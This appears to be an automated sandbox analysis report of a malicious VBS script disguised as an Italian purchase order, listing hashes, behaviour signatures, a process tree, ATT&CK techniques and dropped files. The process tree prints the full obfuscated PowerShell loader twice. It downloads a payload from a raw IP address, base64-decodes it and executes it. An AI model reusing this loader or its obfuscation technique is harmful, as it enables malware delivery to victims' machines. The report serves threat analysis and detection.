Overview

overview

10

Static

static

1

Carlispa_O...17.vbs

windows7-x64

10

Carlispa_O...17.vbs

windows10-2004-x64

8

Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240412-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18-04-2024 01:08

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Carlispa_Ordine_00401702400417.vbs

  • Size

    187KB

  • MD5

    947d8500e25de01d02c5dc254d67c248

  • SHA1

    c073a8f64f2cbb46a1ea768b8c701d17a413b984

  • SHA256

    fbd7521613eeda606382f56a500c5015af001af819556b056bd1ef076820e297

  • SHA512

    fa53189ba4094b1af7a514acf85f832fe51ea2714afb4adea87193ead46c0e01c78f76ccfd342db58bddb45be237bf7d03326194553243d3085488b026294669

  • SSDEEP

    3072:2+w8jqrKK8ccABOwbDS2y2zJETxUuoHh36wH/OLxCxTwvNPapsCRXBDo5mFSartr:GrR8ccABOwbDA2zJETxVu1vH/rsqfXB7

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Carlispa_Ordine_00401702400417.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2568
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ramage = 1;$elektrolysens='Substrin';$elektrolysens+='g';Function Kystlinierne($Proconcentration){$Limonite=$Proconcentration.Length-$Ramage;For($Organistrum=1; $Organistrum -lt $Limonite; $Organistrum+=(2)){$Skolefobien+=$Proconcentration.$elektrolysens.Invoke($Organistrum, $Ramage);}$Skolefobien;}function Ureterectomies($Seafoods){. ($Oleographer199) ($Seafoods);}$Underground=Kystlinierne 'EMroMzFi lTl.a /T5 .F0U L( WLiEn d.o w s, BN.TS 1D0 .U0 ; .WEiSn.6,4 ;W ,xp6U4N; ,r vO:,1 2F1H.V0B)D GNeSc k.o./ 2s0A1K0.0L1S0L1H TFSiFrDeAf oPxh/,1,2 1..V0M ';$Opsparede141=Kystlinierne ' UAs eLrG-RABg,e,n t ';$Fidgets=Kystlinierne 'Mh tAtCpC:,/k/b8A7T.L1O2,1A.,1 0 5,. 1F6 3 /hVOe r sCa l s k r iOfRt.e s 2S0 4S.NmRsRo. ';$Featherbedded=Kystlinierne ' >R ';$Oleographer199=Kystlinierne 'niOe xU ';$Briochen = Kystlinierne 'Ke,cFh,o % a pNp.d,aGt.aT%P\tDBe sUm a,rFe sVt,i a cAe aEeU..EFlSyS .&.& Ae c,h o .$ ';Ureterectomies (Kystlinierne ' $.g,lJo b.aClS: KFoLmAmBe r cLiMe lIlAe =B(Ocum,dA U/ cG O$.BOrIi o cgh eCn.)H ');Ureterectomies (Kystlinierne 'N$SgFlNoTb aolg: G l,oMr iteUnUs =.$KFFiEdJg,e t.s..KsapTl.iAt,(I$ FAe aPtPhaeUrSb e,dgdCeTdM) ');$Fidgets=$Gloriens[0];Ureterectomies (Kystlinierne ',$Lg,l oNbTaTl,:hICn dGd aGmSp eVd.e sS= NpeMw.-QO.b jCeWc.t. ,STy,sPt e.mM.,N eSt,. WUeRb C l i e.n tP ');Ureterectomies (Kystlinierne ' $AI nBdAdPa,mMp.eUdGeaso. HNe aNd,e r.sD[,$ OBp,svp a r e dSeS1O4R1,]K=R$TUInRd eDr,gGr o.u.n dt ');$Proletariseredes=Kystlinierne 'SIEnTd d a mApKeKdreAs . DGoNw n lPo.a,dFF.iRl,e,(A$ FHisdAg,e t sW, $,Nry dBe.rInCeRsI) ';$Proletariseredes=$Kommercielle[1]+$Proletariseredes;$Nydernes=$Kommercielle[0];Ureterectomies (Kystlinierne 'S$Fg l oFb aSlO:,dFaTtPa o m.r aTa d,e s = ( TCeIsPt - PSaBtHhH N$PNMyEd,eHr,nMe sG)R ');while (!$dataomraades) {Ureterectomies (Kystlinierne ' $.g lNo b a l : sCk.r i,v e p aSp iTr =G$ tSr,uIeP ') ;Ureterectomies $Proletariseredes;Ureterectomies (Kystlinierne 'ASOt aFrDt - S l e.e,p 4S ');Ureterectomies (Kystlinierne ' $sg lLoSb aSlS: dRa,t.a,oTm,r aBa d eAs.=F(LTDe sLt - P,aBt hR ,$.N y dGe.rRnTeCs )E ') ;Ureterectomies (Kystlinierne ' $sg,lMo bSa lC:.bse f iPnkgUrRe,d.e =C$,g l o,b.aXl : M eRr o xAeCn e.+S+A%P$pGIl o,r i e.n sG.Tc o.uFnStT ') ;$Fidgets=$Gloriens[$befingrede];}Ureterectomies (Kystlinierne '.$.g l oSb,a.lT:,B.e tGo,n bClCaxnrd eAr,iEe.rZn.e =P CG eCtV- CLoSnBtFe n.t S$ NPy d eBrOnLe s ');Ureterectomies (Kystlinierne ' $OgUlKo,bRa,lU:vKLeNn.yPaSn sDkEe L=K [TS y,s.t.epm..EC oAn.vEe rRtR] :.: F.rBoLm B,a sSe.6 4 S,t,rIi.nAgF(F$ B e tSo nPbWl a n dTe rNi e rFnPeO)B ');Ureterectomies (Kystlinierne ' $Cg lKo bTa,l.:LELk,s,pAo,r,t c hSeBfOeNrSn.eps W=K S[FSSyks tNeDmJ.DTkeUxHtn.,E,nGc ofd i,nRgB],:,:CAFSUC,IWIC.,GKeTtASCtOr.i.nPg,(A$ KUeSnCyCa nSsbk eF) ');Ureterectomies (Kystlinierne ' $,g lMoCbFa,l :FN aPbSoMbWeSsSsAers.= $DE kAs p oBr.tkcFhSeDfReOrMn e.sL.asRuVbHsLtor iLnFgI( 2,9W4 5R0F9,, 2O6K0S1,4L). ');Ureterectomies $Nabobesses;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4236
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Desmarestiaceae.Ely && echo $"
        3⤵
          PID:1200
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Ramage = 1;$elektrolysens='Substrin';$elektrolysens+='g';Function Kystlinierne($Proconcentration){$Limonite=$Proconcentration.Length-$Ramage;For($Organistrum=1; $Organistrum -lt $Limonite; $Organistrum+=(2)){$Skolefobien+=$Proconcentration.$elektrolysens.Invoke($Organistrum, $Ramage);}$Skolefobien;}function Ureterectomies($Seafoods){. ($Oleographer199) ($Seafoods);}$Underground=Kystlinierne 'EMroMzFi lTl.a /T5 .F0U L( WLiEn d.o w s, BN.TS 1D0 .U0 ; .WEiSn.6,4 ;W ,xp6U4N; ,r vO:,1 2F1H.V0B)D GNeSc k.o./ 2s0A1K0.0L1S0L1H TFSiFrDeAf oPxh/,1,2 1..V0M ';$Opsparede141=Kystlinierne ' UAs eLrG-RABg,e,n t ';$Fidgets=Kystlinierne 'Mh tAtCpC:,/k/b8A7T.L1O2,1A.,1 0 5,. 1F6 3 /hVOe r sCa l s k r iOfRt.e s 2S0 4S.NmRsRo. ';$Featherbedded=Kystlinierne ' >R ';$Oleographer199=Kystlinierne 'niOe xU ';$Briochen = Kystlinierne 'Ke,cFh,o % a pNp.d,aGt.aT%P\tDBe sUm a,rFe sVt,i a cAe aEeU..EFlSyS .&.& Ae c,h o .$ ';Ureterectomies (Kystlinierne ' $.g,lJo b.aClS: KFoLmAmBe r cLiMe lIlAe =B(Ocum,dA U/ cG O$.BOrIi o cgh eCn.)H ');Ureterectomies (Kystlinierne 'N$SgFlNoTb aolg: G l,oMr iteUnUs =.$KFFiEdJg,e t.s..KsapTl.iAt,(I$ FAe aPtPhaeUrSb e,dgdCeTdM) ');$Fidgets=$Gloriens[0];Ureterectomies (Kystlinierne ',$Lg,l oNbTaTl,:hICn dGd aGmSp eVd.e sS= NpeMw.-QO.b jCeWc.t. ,STy,sPt e.mM.,N eSt,. WUeRb C l i e.n tP ');Ureterectomies (Kystlinierne ' $AI nBdAdPa,mMp.eUdGeaso. HNe aNd,e r.sD[,$ OBp,svp a r e dSeS1O4R1,]K=R$TUInRd eDr,gGr o.u.n dt ');$Proletariseredes=Kystlinierne 'SIEnTd d a mApKeKdreAs . DGoNw n lPo.a,dFF.iRl,e,(A$ FHisdAg,e t sW, $,Nry dBe.rInCeRsI) ';$Proletariseredes=$Kommercielle[1]+$Proletariseredes;$Nydernes=$Kommercielle[0];Ureterectomies (Kystlinierne 'S$Fg l oFb aSlO:,dFaTtPa o m.r aTa d,e s = ( TCeIsPt - PSaBtHhH N$PNMyEd,eHr,nMe sG)R ');while (!$dataomraades) {Ureterectomies (Kystlinierne ' $.g lNo b a l : sCk.r i,v e p aSp iTr =G$ tSr,uIeP ') ;Ureterectomies $Proletariseredes;Ureterectomies (Kystlinierne 'ASOt aFrDt - S l e.e,p 4S ');Ureterectomies (Kystlinierne ' $sg lLoSb aSlS: dRa,t.a,oTm,r aBa d eAs.=F(LTDe sLt - P,aBt hR ,$.N y dGe.rRnTeCs )E ') ;Ureterectomies (Kystlinierne ' $sg,lMo bSa lC:.bse f iPnkgUrRe,d.e =C$,g l o,b.aXl : M eRr o xAeCn e.+S+A%P$pGIl o,r i e.n sG.Tc o.uFnStT ') ;$Fidgets=$Gloriens[$befingrede];}Ureterectomies (Kystlinierne '.$.g l oSb,a.lT:,B.e tGo,n bClCaxnrd eAr,iEe.rZn.e =P CG eCtV- CLoSnBtFe n.t S$ NPy d eBrOnLe s ');Ureterectomies (Kystlinierne ' $OgUlKo,bRa,lU:vKLeNn.yPaSn sDkEe L=K [TS y,s.t.epm..EC oAn.vEe rRtR] :.: F.rBoLm B,a sSe.6 4 S,t,rIi.nAgF(F$ B e tSo nPbWl a n dTe rNi e rFnPeO)B ');Ureterectomies (Kystlinierne ' $Cg lKo bTa,l.:LELk,s,pAo,r,t c hSeBfOeNrSn.eps W=K S[FSSyks tNeDmJ.DTkeUxHtn.,E,nGc ofd i,nRgB],:,:CAFSUC,IWIC.,GKeTtASCtOr.i.nPg,(A$ KUeSnCyCa nSsbk eF) ');Ureterectomies (Kystlinierne ' $,g lMoCbFa,l :FN aPbSoMbWeSsSsAers.= $DE kAs p oBr.tkcFhSeDfReOrMn e.sL.asRuVbHsLtor iLnFgI( 2,9W4 5R0F9,, 2O6K0S1,4L). ');Ureterectomies $Nabobesses;"
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3368
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Desmarestiaceae.Ely && echo $"
            4⤵
              PID:3548
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 3368 -s 2444
              4⤵
              • Program crash
              PID:4564
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3368 -ip 3368
        1⤵
          PID:1052

        Network

        MITRE ATT&CK Matrix ATT&CK v13

        Initial Access

        Execution

        Persistence

        Privilege Escalation

        Defense Evasion

        Credential Access

        Discovery

        Query Registry

        1
        T1012

        System Information Discovery

        2
        T1082

        Lateral Movement

        Collection

        Exfiltration

        Command and Control

        Impact

        Resource Development

        Reconnaissance

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jm2lvqpk.ihv.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit
        • C:\Users\Admin\AppData\Roaming\Desmarestiaceae.Ely
          Filesize

          417KB

          MD5

          be7ad87be48fca2d5b2ac91abfc656de

          SHA1

          a9424148bfa17eaa9580bb24f7abc8f5a0a9374e

          SHA256

          57a536f514130e0ccdfb16b33f068e45d4f1c7c7eb1937dd8ee1dfbdee4f947f

          SHA512

          8d1b5fe0789fda31a60bcc04eb33ca688c2ab97914393a2b9f14e15c646e845d0499e8b6db1f39947525a12942e59bd58e2c616576066532eb14e72c321fba78

          Download Submit
        • memory/3368-24-0x0000000005380000-0x00000000053E6000-memory.dmp
          Filesize

          408KB

          Download
        • memory/3368-39-0x00000000060D0000-0x00000000060EA000-memory.dmp
          Filesize

          104KB

          Download
        • memory/3368-25-0x0000000005450000-0x00000000054B6000-memory.dmp
          Filesize

          408KB

          Download
        • memory/3368-44-0x0000000074DA0000-0x0000000075550000-memory.dmp
          Filesize

          7.7MB

          Download
        • memory/3368-19-0x0000000074DA0000-0x0000000075550000-memory.dmp
          Filesize

          7.7MB

          Download
        • memory/3368-18-0x00000000045C0000-0x00000000045F6000-memory.dmp
          Filesize

          216KB

          Download
        • memory/3368-20-0x0000000004710000-0x0000000004720000-memory.dmp
          Filesize

          64KB

          Download
        • memory/3368-21-0x0000000004710000-0x0000000004720000-memory.dmp
          Filesize

          64KB

          Download
        • memory/3368-22-0x0000000004D50000-0x0000000005378000-memory.dmp
          Filesize

          6.2MB

          Download
        • memory/3368-35-0x0000000005500000-0x0000000005854000-memory.dmp
          Filesize

          3.3MB

          Download
        • memory/3368-42-0x0000000007FC0000-0x0000000008564000-memory.dmp
          Filesize

          5.6MB

          Download
        • memory/3368-41-0x0000000006DC0000-0x0000000006DE2000-memory.dmp
          Filesize

          136KB

          Download
        • memory/3368-23-0x0000000004B80000-0x0000000004BA2000-memory.dmp
          Filesize

          136KB

          Download
        • memory/3368-36-0x0000000005B50000-0x0000000005B6E000-memory.dmp
          Filesize

          120KB

          Download
        • memory/3368-37-0x0000000005B90000-0x0000000005BDC000-memory.dmp
          Filesize

          304KB

          Download
        • memory/3368-38-0x0000000007390000-0x0000000007A0A000-memory.dmp
          Filesize

          6.5MB

          Download
        • memory/3368-40-0x0000000006E60000-0x0000000006EF6000-memory.dmp
          Filesize

          600KB

          Download
        • memory/4236-12-0x00007FFDD5190000-0x00007FFDD5C51000-memory.dmp
          Filesize

          10.8MB

          Download
        • memory/4236-47-0x00007FFDD5190000-0x00007FFDD5C51000-memory.dmp
          Filesize

          10.8MB

          Download
        • memory/4236-14-0x000001FAE1F80000-0x000001FAE1F90000-memory.dmp
          Filesize

          64KB

          Download
        • memory/4236-11-0x000001FAE4100000-0x000001FAE4122000-memory.dmp
          Filesize

          136KB

          Download
        • memory/4236-17-0x000001FAE1F80000-0x000001FAE1F90000-memory.dmp
          Filesize

          64KB

          Download
        • memory/4236-13-0x000001FAE1F80000-0x000001FAE1F90000-memory.dmp
          Filesize

          64KB

          Download